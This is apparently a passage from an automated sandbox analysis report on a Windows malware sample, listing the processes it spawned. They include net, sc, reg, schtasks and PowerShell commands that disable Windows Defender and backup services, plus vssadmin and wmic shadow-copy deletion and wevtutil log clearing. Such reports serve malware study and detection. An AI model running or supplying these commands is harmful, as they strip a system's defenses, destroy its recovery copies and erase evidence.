to memory of 1148 632 net.exe net1.exe PID 632 wrote to memory of 1148 632 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\SysWOW64\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:672 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:584
-
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1364
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1116
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:900 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1120
-
C:\Windows\SysWOW64\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1200
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1216 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:676
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1660
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1148
-
C:\Windows\SysWOW64\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1096
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1928
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1720
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1080
-
C:\Windows\SysWOW64\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1696
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵PID:612
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵PID:932
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1944
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1736
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1704
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1240
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1648
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:112
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:276
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1120
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1480
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1512
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1284
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1684
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1228
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1428
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1964
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:868
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1796
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1484
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1728
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1620
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:784
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:864
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1832
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1332
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:2024
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1008
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1792
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1932
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1952
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1740
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1616
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:776
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1744 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1208
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1328 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:700 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1768 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:472 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1776 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1076 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1316
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1824 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1348
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1376 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1824
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:972
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD54e230dd18980fbe3b34c4d3ef2f33f8a
SHA1d8236222ce1f417c445c17624e4cffce0abd4137
SHA256109c8a822a3b6d7b6f1010adf0b88c1b38006b1b3e21e689ace3455ccfe1b294
SHA51212ebbec1e065c6a0fa92b2b32b8a9b849cb09a473676247b6b2ce3cf3c0bb334901569d783ff237400d178b7e97160f2be8e6bb64693bb49d88289330972a8a2